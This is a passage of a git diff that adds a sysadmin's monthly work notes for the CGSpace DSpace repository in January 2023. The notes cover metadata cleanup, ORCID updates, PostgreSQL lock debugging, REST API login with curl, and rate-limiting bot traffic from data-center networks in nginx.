$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
3792 dspaceWeb
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
4460 dspaceWeb
```
- I don't see any other system statistics that look out of order...
- DSpace sessions, network throughput, CPU, etc all seem sane...
- And then all of a sudden, I didn't do anything, but all the locks disappeared and I was able to access the website... WTF
## 2022-12-30
- Start a harvest on AReS
## 2022-12-31
- I found a bunch of items on AReS that have issue dates in 2023 which made me curious
- Looking closer, I think all of these have been tagged incorrectly because they were published online already in 2022
- I sent a mail to Abenet and Bizu to ask, but for sure I know that PRMS will be considering first published date as first published date, no matter if that is online or in print
- I also added some ORCID identifiers to our list and generated thumbnails for some journal articles that were Creative Commons
<!-- vim: set sw=2 ts=2: -->

609
content/posts/2023-01.md Normal file
View File

@ -0,0 +1,609 @@
---
title: "January, 2023"
date: 2023-01-01T08:44:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-01-01
- Apply some more ORCID identifiers to items on CGSpace using my `2022-09-22-add-orcids.csv` file
- I want to update all ORCID names and refresh them in the database
- I see we have some new ones that aren't in our list if I combine with this file:
<!--more-->
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1939
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1973
```
- I will extract and process them with my `resolve-orcids.py` script:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-01-orcids.txt
$ ./ilri/resolve-orcids.py -i /tmp/2023-01-01-orcids.txt -o /tmp/2023-01-01-orcids-names.txt -d
```
- Then update them in the database:
```console
$ ./ilri/update-orcids.py -i /tmp/2023-01-01-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- Load on CGSpace is high around 9.x
- I see there is a CIAT bot harvesting via the REST API with IP 45.5.186.2
- Other than that I don't see any particular system stats as alarming
- There has been a marked increase in load in the last few weeks, perhaps due to Initiative activity...
- Perhaps there are some stuck PostgreSQL locks from CLI tools?
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
58 dspaceCli
46 dspaceWeb
```
- The current time on the server is 08:52 and I see the dspaceCli locks were started at 04:00 and 05:00... so I need to check which cron jobs those belong to as I think I noticed this last month too
- I'm going to wait and see if they finish, but by tomorrow I will kill them
## 2023-01-02
- The load on the server is now very low and there are no more locks from dspaceCli
- So there *was* some long-running process that was running and had to finish!
- That finally sheds some light on the "high load on Sunday" problem where I couldn't find any other distinct pattern in the nginx or Tomcat requests
## 2023-01-03
- The load from the server on Sundays, which I have noticed for a long time, seems to be coming from the DSpace checker cron job
- This checks the checksums of all bitstreams to see if they match the ones in the database
- I exported the entire CGSpace metadata to do country/region checks with `csv-metadata-quality`
- I extracted only the items with countries, which was about 48,000, then split the file into parts of 10,000 items, but the upload found 2,000 changes in the first one and took several hours to complete...
- IWMI sent me ORCID identifiers for new scientsts, bringing our total to 2,010
## 2023-01-04
- I finally finished applying the region imports (in five batches of 10,000)
- It was about 7,500 missing regions in total...
- Now I will move on to doing the Initiative mappings
- I modified my `fix-initiative-mappings.py` script to only write out the items that have updated mappings
- This makes it way easier to apply fixes to the entire CGSpace because we don't try to import 100,000 items with no changes in mappings
- More dspaceCli locks from 04:00 this morning (current time on server is 07:33) and today is a Wednesday
- The checker cron job runs on `0,3`, which is Sunday and Wednesday, so this is from that...
- Finally at 16:30 I decided to kill the PIDs associated with those locks...
- I am going to disable that cron job for now and watch the server load for a few weeks
- Start a harvest on AReS
## 2023-01-08
- It's Sunday and I see some PostgreSQL locks belonging to dspaceCli that started at 05:00
- That's strange because I disabled the `dspace checker` one last week, so I'm not sure which this is...
- It's currently 2:30PM on the server so these locks have been there for almost twelve hours
- I exported the entire CGSpace to update the Initiative mappings
- Items were mapped to ~58 new Initiative collections
- Then I ran the ORCID import to catch any new ones that might not have been tagged
- Then I started a harvest on AReS
## 2023-01-09
- Fix some invalid Initiative names on CGSpace and then check for missing mappings
- Check for missing regions in the Initiatives collection
- Export a list of author affiliations from the Initiatives community for Peter to check
- Was slightly ghetto because I did it from a CSV export of the Initiatives community, then imported to OpenRefine to split multi-value fields, then did some sed nonsense to handle the quoting:
```console
$ csvcut -c 'cg.contributor.affiliation[en_US]' ~/Downloads/2023-01-09-initiatives.csv | \
sed -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' | \
sort -u | \
sed -e 's/^\(.*\)/"\1/' -e 's/\(.*\)$/\1"/' > /tmp/2023-01-09-initiatives-affiliations.csv
```
## 2023-01-10
- Export the CGSpace Initiatives collection to check for missing regions and collection mappings
## 2023-01-11
- I'm trying the DSpace 7 REST API again
- While following onathe [DSpace 7 REST API authentication docs](https://github.com/DSpace/RestContract/blob/main/authentication.md) I still cannot log in via curl on the command line because I get a `Access is denied. Invalid CSRF token.` message
- Logging in via the HAL Browser works...
- Someone on the DSpace Slack mentioned that the [authentication documentation is out of date](https://github.com/DSpace/RestContract/issues/209) and we need to specify the cookie too
- I tried it and finally got it to work:
```console
$ curl --head https://dspace7test.ilri.org/server/api
...
set-cookie: DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519; Path=/server; Secure; HttpOnly; SameSite=None
dspace-xsrf-token: 42c78c56-613d-464f-89ea-79142fc5b519
$ curl -v -X POST https://dspace7test.ilri.org/server/api/authn/login --data "user=alantest%40cgiar.org&password=dspace" -H "X-XSRF-TOKEN: 42c78c56-613d-464f-89ea-79142fc5b519" -b "DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519"
...
authorization: Bearer eyJh...9-0
$ curl -v "https://dspace7test.ilri.org/api/core/items" -H "Authorization: Bearer eyJh...9-0"
```
- I created [a pull request](https://github.com/DSpace/RestContract/pull/213) to fix the docs
- I did quite a lot of cleanup and updates on the IFPRI batch items for the Gender Equality batch upload
- Then I uploaded them to CGSpace
- I added about twenty more ORCID identifiers to my list and tagged them on CGSpace
## 2023-01-12
- I exported the entire CGSpace and did some cleanups on all metadata in OpenRefine
- I was primarily interested in normalizing the DOIs, but I also normalized a bunch of publishing places
- After this imports I will export it again to do the Initiative and region mappings
- I ran the `fix-initiative-mappings.py` script and got forty-nine new mappings...
- I added several dozen new ORCID identifiers to my list and tagged ~500 on CGSpace
- Start a harvest on AReS
## 2023-01-13
- Do a bit more cleanup on licenses, issue dates, and publishers
- Then I started importing my large list of 5,000 items changed from yesterday
- Help Karen add abstracts to a bunch of SAPLING items that were missing them on CGSpace
- For now I only did open access journal articles, but I should do the reports and others too
## 2023-01-14
- Export CGSpace and check for missing Initiative mappings
- There were a total of twenty-five
- Then I exported the Initiatives communinty to check the countries and regions
## 2023-01-15
- Start a harvest on AReS
## 2023-01-16
- Batch import four IFPRI items for CGIAR Initiative on Low-Emission Food Systems
- Batch import another twenty-eight items for IFPRI across several Initiatives
- On this one I did quite a bit of extra work to check for CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
- I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
- Then I checked for duplicates and ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
## 2023-01-17
- Batch import another twenty-three items for IFPRI across several Initiatives
- I checked the IFPRI eBrary for extra CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
- I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
- Then I found and removed one duplicate in these items, as well as another on CGSpace already (!): 10568/126669
- Then I ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
- I exported the Initiatives collection to check the mappings, regions, and other metadata with csv-metadata-quality
- I also added a bunch of ORCID identifiers to my list and tagged 837 new metadata values on CGSpace
- There is a high load on CGSpace pretty regularly
- Looking at Munin it shows there is a marked increase in DSpace sessions the last few weeks:
![DSpace sessions year](/cgspace-notes/2023/01/jmx_dspace_sessions-year.png)
- Is this attributable to all the PRMS harvesting?
- I also see some PostgreSQL locks starting earlier today:
![PostgreSQL locks day](/cgspace-notes/2023/01/postgres_connections_ALL-day.png)
- I'm curious to see what kinds of IPs have been connecting, so I will look at the last few weeks:
```console
# zcat --force /var/log/nginx/{rest,access,library-access,oai}.log /var/log/nginx/{rest,access,library-access,oai}.log.1 /var/log/nginx/{rest,access,library-access,oai}.log.{2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25}.gz | awk '{print $1}' | sort | uniq > /tmp/2023-01-17-cgspace-ips.txt
# wc -l /tmp/2023-01-17-cgspace-ips.txt
129446 /tmp/2023-01-17-cgspace-ips.txt
```
- I ran the IPs through my `resolve-addresses-geoip2.py` script to resolve their ASNs/networks, then extracted some lists of data center ISPs by eyeballing them (Amazon, Google, Microsoft, Apple, DigitalOcean, HostRoyale, and a dozen others):
```console
$ csvgrep -c asn -r '^(8075|714|16276|15169|23576|24940|13238|32934|14061|12876|55286|203020|204287|7922|50245|6939|16509|14618)$' \
/tmp/2023-01-17-cgspace-ips.csv | csvcut -c network | \
sed 1d | sort | uniq > /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
776 /tmp/networks-to-block.txt
```
- I added the list of networks to nginx's `bot-networks.conf` so they will all be heavily rate limited
- Looking at the Munin stats again I see the load has been extra high since yesterday morning:
![CPU week](/cgspace-notes/2023/01/cpu-week.png)
- But still, it's suspicious that there are so many PostgreSQL locks
- Looking at the Solr stats to check the hits the last month (actually I skipped December because I was so busy)
- I see 31.148.223.10 is on ALFA TELECOM s.r.o. in Russia and it made 43,000 requests this month (and 400,000 more last month!)
- I see 18.203.245.60 is on Amazon and it uses weird user agents, different with each request
- I see 3.249.192.212 is on Amazon and it uses weird user agents, different with each request
- I see 34.244.160.145 is on Amazon and it uses weird user agents, different with each request
- I see 52.213.59.101 is on Amazon and it uses weird user agents, different with each request
- I see 91.209.8.29 is in Bulgaria on DGM EOOD and is low risk according to Scamlytics, but their user agent is all lower case and it's a data center ISP so nope
- I see 54.78.176.127 is on Amazon and it uses weird user agents, different with each request
- I see 54.246.128.111 is on Amazon and it uses weird user agents, different with each request
- I see 54.74.197.53 is on Amazon and it uses weird user agents, different with each request
- I see 52.16.103.133 is on Amazon and it uses weird user agents, different with each request
- I see 63.32.99.252 is on Amazon and it uses weird user agents, different with each request
- I see 176.34.141.181 is on Amazon and it uses weird user agents, different with each request
- I see 34.243.17.80 is on Amazon and it uses weird user agents, different with each request
- I see 34.240.206.16 is on Amazon and it uses weird user agents, different with each request
- I see 18.203.81.120 is on Amazon and it uses weird user agents, different with each request
- I see 176.97.210.106 is on Tube Hosting and is rate VERY BAD, malicious, scammy on everything I checked
- I see 79.110.73.54 is on ALFA TELCOM / Serverel and is using a different, weird user agent with each request
- There are too many to count... so I will purge these and then move on to user agents
- I purged hits from those IPs:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 439185 hits from 31.148.223.10 in statistics
Purging 2151 hits from 18.203.245.60 in statistics
Purging 1990 hits from 3.249.192.212 in statistics
Purging 1975 hits from 34.244.160.145 in statistics
Purging 1969 hits from 52.213.59.101 in statistics
Purging 2540 hits from 91.209.8.29 in statistics
Purging 1624 hits from 54.78.176.127 in statistics
Purging 1236 hits from 54.74.197.53 in statistics
Purging 1327 hits from 54.246.128.111 in statistics
Purging 1108 hits from 52.16.103.133 in statistics
Purging 1045 hits from 63.32.99.252 in statistics
Purging 999 hits from 176.34.141.181 in statistics
Purging 997 hits from 34.243.17.80 in statistics
Purging 985 hits from 34.240.206.16 in statistics
Purging 862 hits from 18.203.81.120 in statistics
Purging 1654 hits from 176.97.210.106 in statistics
Purging 1628 hits from 51.81.193.200 in statistics
Purging 1020 hits from 79.110.73.54 in statistics
Purging 842 hits from 35.153.105.213 in statistics
Purging 1689 hits from 54.164.237.125 in statistics
Total number of bot hits purged: 466826
```
- Looking at user agents in Solr statistics from 2022-12 and 2023-01 I see some weird ones:
- `azure-logic-apps/1.0 (workflow e1f855704d6543f48be6205c40f4083f; version 08585300079823949478) microsoft-flow/1.0`
- `Gov employment data scraper ([[your email]])`
- `Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)`
- `crownpeak`
- `Mozilla/5.0 (compatible)`
- Also, a ton of them are lower case, which I've never seen before... it might be possible, but looks super fishy to me:
- `mozilla/5.0 (x11; ubuntu; linux x86_64; rv:84.0) gecko/20100101 firefox/86.0`
- `mozilla/5.0 (macintosh; intel mac os x 11_3) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64; rv:86.0) gecko/20100101 firefox/86.0`
- `mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/92.0.4515.159 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/88.0.4324.104 safari/537.36`
- `mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36`
- I purged some of those:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
Purging 1658 hits from azure-logic-apps\/1.0 in statistics
Purging 948 hits from Gov employment data scraper in statistics
Purging 786 hits from Microsoft\.Data\.Mashup in statistics
Purging 303 hits from crownpeak in statistics
Purging 332 hits from Mozilla\/5.0 (compatible) in statistics
Total number of bot hits purged: 4027
```
- Then I ran all system updates on the server and rebooted it
- Hopefully this clears the locks and the nginx mitigation helps with the load from non-human hosts in large data centers
- I need to re-work how I'm doing this whitelisting and blacklisting... it's way too complicated now
- Export entire CGSpace to check Initiative mappings, and add nineteen...
- Start a harvest on AReS
## 2023-01-18
- I'm looking at all the ORCID identifiers in the database, which seem to be way more than I realized:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2023-01-18-orcid-identifiers.txt;
COPY 4231
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2023-01-18-orcid-identifiers.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-18-orcids.txt
$ wc -l /tmp/2023-01-18-orcids.txt
4518 /tmp/2023-01-18-orcids.txt
```
- Then I resolved them from ORCID and updated them in the database:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2023-01-18-orcids.txt -o /tmp/2023-01-18-orcids-names.txt -d
$ ./ilri/update-orcids.py -i /tmp/2023-01-18-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- Then I updated the controlled vocabulary
- CGSpace became inactive in the afternoon, with a high number of locks, but surprisingly low CPU usage:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
83 dspaceApi
7829 dspaceWeb
```
- In the DSpace logs I see some weird SQL messages, so I decided to restart PostgreSQL and Tomcat 7...
- I hope this doesn't cause some issue with in-progress workflows...
- I see another user on Cox in the US (98.186.216.144) crawling and scraping XMLUI with Python
- I will add python to the list of bad bot user agents in nginx
- While looking into the locks I see some potential Java heap issues
- Indeed, I see two out of memory errors in Tomcat's journal:
```console
tomcat7[310996]: java.lang.OutOfMemoryError: Java heap space
tomcat7[310996]: Jan 18, 2023 1:37:03 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
```
- Which explains why the locks went down to normal numbers as I was watching... (because Java crashed)
## 2023-01-19
- Update a bunch of ORCID identifiers, Initiative mappings, and regions on CGSpace
- So it seems an IFPRI user got caught up in the blocking I did yesterday
- Their ISP is Comcast...
- I need to re-work the ASN blocking on nginx, but for now I will just get the ASNs again minus Comcast:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS15169 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS32934 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS14618
$ cat AS* | sort | uniq | wc -l
18179
$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
5872 /tmp/networks.txt
```
## 2023-01-20
- A lot of work on CGSpace metadata (ORCID identifiers, regions, and Initiatives)
- I noticed that MEL and CGSpace are using slightly different vocabularies for SDGs so I sent an email to Salem and Sara
## 2023-01-21
- Export the Initiatives community again to perform collection mappings and country/region fixes
## 2023-01-22
- There has been a high load on the server for a few days, currently 8.0... and I've been seeing some PostgreSQL locks stuck all day:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
11 dspaceApi
28 dspaceCli
981 dspaceWeb
```
- Looking at the locks I see they are from this morning at 5:00 AM, which is the `dspace checker-email` script
- Last week I disabled the one that ones at 4:00 AM, but I guess I will experiment with disabling this too...
- Then I killed the PIDs of the locks
```console
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | less -S
...
$ ps auxw | grep 18986
postgres 1429108 1.9 1.5 3359712 508148 ? Ss 05:00 13:40 postgres: 12/main: dspace dspace 127.0.0.1(18986) SELECT
```
- Also, I checked the age of the locks and killed anything over 1 day:
```console
$ psql < locks-age.sql | grep days | less -S
```
- Then I ran all updates on the server and restarted it...
- Salem responded to my question about the SDG mismatch between MEL and CGSpace
- We agreed to use a version based on the text of [this site](http://metadata.un.org/sdg/?lang=en)
- Salem is having issues with some REST API submission / updates
- I updated DSpace Test with a recent CGSpace backup and created a super admin user for him to test
- Clean and normalize fifty-eight IFPRI records for batch import to CGSpace
- I did a duplicate check and found six, so that's good!
- I exported the entire CGSpace to check for missing Initiative mappings
- Then I exported the Initiatives community to check for missing regions
- Then I ran the script to check for missing ORCID identifiers
- Then *finally*, I started a harvest on AReS
## 2023-01-23
- Salem found that you can actually harvest everything in DSpace 7 using the [`discover/browses` endpoint](https://dspace7test.ilri.org/server/api/discover/browses/title/items?page=1&size=100)
- Exported CGSpace again to examine and clean up a bunch of stuff like ISBNs in the ISSN field, DOIs in the URL field, dataset URLs in the DOI field, normalized a bunch of publisher places, fixed some countries and regions, fixed some licenses, etc
- I noticed that we still have "North America" as a region, but according to UN M.49 that is the continent, which comprises "Northern America" the region, so I will update our controlled vocabularies and all existing entries
- I imported changes to 1,800 items
- When it finished five hours later I started a harvest on AReS
## 2023-01-24
- Proof and upload seven items for the Rethinking Food Markets Initiative for IFPRI
- Export CGSpace to do some minor cleanups, Initiative collection mappings, and region fixes
- I also added "CGIAR Trust Fund" to all items with an Initiative in `cg.contributor.initiative`
## 2023-01-25
- Oh shit, the import last night ran for twelve hours and then died:
```console
Error committing changes to database: could not execute statement
Aborting most recent changes.
```
- I re-submitted a smaller version without the CGIAR Trust Fund changes for now just so we get the regions and other fixes
- Do some work on SAPLING issues for CGSpace, sending a large list of issues we found to the MEL team for items they submitted
- Abenet noticed that the number of items in the Initiatives community appears to have dropped by about 2,000 in the XMLUI
- We looked on AReS and all the items are still there
- I looked in the DSpace log and see around 2,000 messages like this:
```console
2023-01-25 07:14:59,529 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: c9fac1f2-6b2b-4941-8077-40b7b5c936b6 message:missing required field: epersonID
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
at org.dspace.core.Context.dispatchEvents(Context.java:455)
at org.dspace.core.Context.commit(Context.java:424)
at org.dspace.core.Context.complete(Context.java:380)
at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- I filed a ticket with Atmire to ask them
- For now I just did a light Discovery reindex (not the full one) and all the items appeared again
- Submit an issue to MEL GitHub regarding the capitalization of CRPs: https://github.com/CodeObia/MEL/issues/11133
- I talked to Salem and he said that this is a legacy thing from when CGSpace was using ALL CAPS for most of its metadata. I provided him with [our current controlled vocabulary for CRPs](https://ilri.github.io/cgspace-submission-guidelines/cg-contributor-crp/cg-contributor-crp.txt) and he will update it in MEL.
- On that note, Peter and Abenet and I realized that we still have an old field `cg.subject.crp` with about 450 values in it, but it has not been used for a few years (they are using the old ALL CAPS CRPs)
- I exported this list of values to lowercase them and move them to `cg.contributor.crp`
- Even if some items end up with multiple CRPs, they will get de-duplicated when I remove duplicate values soon
```console
$ ./ilri/fix-metadata-values.py -i /tmp/2023-01-25-fix-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t correct
$ ./ilri/move-metadata-values.py -i /tmp/2023-01-25-move-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t cg.contributor.crp
```
- After fixing and moving them all, I deleted the `cg.subject.crp` field from the metadata registry
- I realized a smarter way to update the text lang attributes of metadata would be to restrict the query to items that are in the archive and not withdrawn:
```sql
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn) AND text_lang IS NULL OR text_lang IN ('en', '');
```
- I tried that in a transaction and it hung, so I canceled it and rolled back
- I see some PostgreSQL locks attributed to `dspaceApi` that were started at `2023-01-25 13:40:04.529087+01` and haven't changed since then (that's eight hours ago)
- I killed the pid...
- There were also saw some locks owned by `dspaceWeb` that were nine and four hours old, so I killed those too...
- Now Maria was able to archive one submission of hers that was hanging all afternoon, but I still can't run the update on the text langs...
- Export entire CGSpace to do Initiative mappings again
- Started a harvest on AReS
## 2023-01-26
- Export entire CGSpace to do some metadata cleanup on various fields
- I also added "CGIAR Trust Fund" to all items in the Initiatives community
## 2023-01-27
- Export a list of affiliations in the Initiatives community for Peter, trying a new method to avoid exporting *everything* from PostgreSQL:
```console
$ dspace metadata-export -i 10568/115087 -f /tmp/2023-01-27-initiatives.csv
$ csvcut -c 'cg.contributor.affiliation[en_US]' 2023-01-27-initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -h \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-01-27-initiatives-affiliations.csv
```
- The first sed command strips the quotes, deletes empty lines, and splits multiple values on "||"
- The awk command sets the field separator to something so we can get the second "field" of the sort command, ie:
```console
...
309 International Center for Agricultural Research in the Dry Areas
412 International Livestock Research Institute
```
- The second sed command adds the CSV header and quotes back
- I did the same for authors and donors and send them to Peter to make corrections
## 2023-01-28
- Daniel from the Alliance said they are getting an HTTP 401 when trying to submit items to CGSpace via the REST API
## 2023-01-29
- Export the entire CGSpace to do Initiatives collection mappings
- I was thinking about a way to use Crossref's API to enrich our data, for example checking registered DOIs for license information, publishers, etc
- Turns out I had already written `crossref-doi-lookup.py` last year, and it works
- I exported a list of all DOIs without licenses from CGSpace, minus the CIFOR ones because I know they aren't registered on Crossref, which is about 11,800 DOIs
```console
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
| csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
| sed 1d > /tmp/2023-01-29-dois.txt
$ wc -l /tmp/2023-01-29-dois.txt
11819 /tmp/2023-01-29-dois.txt
$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-01-29-dois.txt -o /tmp/crossref-results.csv
$ csvcut -c 'id,cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
| sed -e 's_https://doi.org/__g' -e 's_https://dx.doi.org/__g' -e 's/cg.identifier.doi\[en_US\]/doi/' \
> /tmp/cgspace-temp.csv
$ csvjoin -c doi /tmp/cgspace-temp.csv /tmp/crossref-results.csv \
| csvgrep -c license -r 'creative' \
| sed '1s/license/dcterms.license[en_US]/' \
| csvcut -c id,license > /tmp/2023-01-29-new-licenses.csv
```
- The above was done with just 5,000 DOIs because it was taking a long time, but after the last step I imported into OpenRefine to clean up the license URLs
- Then I imported 635 new licenses to CGSpace woooo
- After checking the remaining 6,500 DOIs there were another 852 new licenses, woooo
- Peter finished the corrections on affiliations, authors, and donors
- I quickly checked them and applied each on CGSpace
- Start a harvest on AReS
## 2023-01-30
- Run the thumbnail fixer tasks on the Initiatives collections:
```console
$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails 10568/115087 | tee -a /tmp/FixLowQualityThumbnails.log
$ grep -c remove /tmp/FixLowQualityThumbnails.log
16
$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails 10568/115087 | tee -a /tmp/FixJpgJpgThumbnails.log
$ grep -c replacing /tmp/FixJpgJpgThumbnails.log
13
```
## 2023-01-31
- Someone from the Google Scholar team contacted us to ask why Googlebot is blocked from crawling CGSpace
- I said that I blocked them because they crawl haphazardly and we had high load during PRMS reporting
- Now I will unblock their ASN15169 in nginx...
- I urged them to be smarter about crawling since we're a small team and they are a huge engineering company
- I removed their ASN and regenerted my list from 2023-01-17:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS32934 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS14618
$ cat AS* | sort | uniq | wc -l
17134
$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
```
- Then I updated nginx...
- Re-run the scripts to delete duplicate metadata values and update item timestamps that I originally used in 2022-11
- This was about 650 duplicate metadata values...
- Exported CGSpace to do some metadata interrogation in OpenRefine
- I looked at items that are set as `Limited Access` but have Creative Commons licenses
- I filtered ~150 that had DOIs and checked them on the Crossref API using `crossref-doi-lookup.py`
- Of those, only about five or so were incorrectly marked as having Creative Commons licenses, so I set those to copyrighted
- For the rest, I set them to Open Access
- Start a harvest on AReS
<!-- vim: set sw=2 ts=2: -->

423
content/posts/2023-02.md Normal file
View File

@ -0,0 +1,423 @@
---
title: "February, 2023"
date: 2023-02-01T10:57:36+03:00
